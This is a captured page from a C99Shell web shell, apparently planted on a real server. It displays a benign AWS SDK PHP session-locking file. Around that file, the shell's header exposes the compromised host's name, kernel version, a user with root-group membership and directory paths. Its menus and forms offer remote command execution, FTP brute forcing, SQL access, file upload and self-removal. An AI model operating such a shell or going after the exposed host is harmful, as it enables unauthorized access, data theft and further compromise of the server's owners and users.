!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/DynamoDb/   drwxr-xr-x
Free 28.74 GB of 117.98 GB (24.36%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LockingSessionConnection.php (1.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws\DynamoDb;

use 
Aws\DynamoDb\Exception\DynamoDbException;

/**
 * The locking connection adds locking logic to the read operation.
 */
class LockingSessionConnection extends StandardSessionConnection
{
    public function 
__construct(DynamoDbClient $client, array $config = [])
    {
        
parent::__construct($client$config);
    }

    
/**
     * {@inheritdoc}
     * Retries the request until the lock can be acquired
     */
    
public function read($id)
    {
        
// Create the params for the UpdateItem operation so that a lock can be
        // set and item returned (via ReturnValues) in a one, atomic operation.
        
$params = [
            
'TableName'        => $this->getTableName(),
            
'Key'              => $this->formatKey($id),
            
'Expected'         => ['lock' => ['Exists' => false]],
            
'AttributeUpdates' => ['lock' => ['Value' => ['N' => '1']]],
            
'ReturnValues'     => 'ALL_NEW',
        ];

        
// Acquire the lock and fetch the item data.
        
$timeout  time() + $this->getMaxLockWaitTime();
        while (
true) {
            try {
                
$item = [];
                
$result $this->client->updateItem($params);
                if (isset(
$result['Attributes'])) {
                    foreach (
$result['Attributes'] as $key => $value) {
                        
$item[$key] = current($value);
                    }
                }
                return 
$item;
            } catch (
DynamoDbException $e) {
                if (
$e->getAwsErrorCode() === 'ConditionalCheckFailedException'
                    
&& time() < $timeout
                
) {
                    
usleep(rand(
                        
$this->getMinLockRetryMicrotime(),
                        
$this->getMaxLockRetryMicrotime()
                    ));
                } else {
                    break;
                }
            }
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--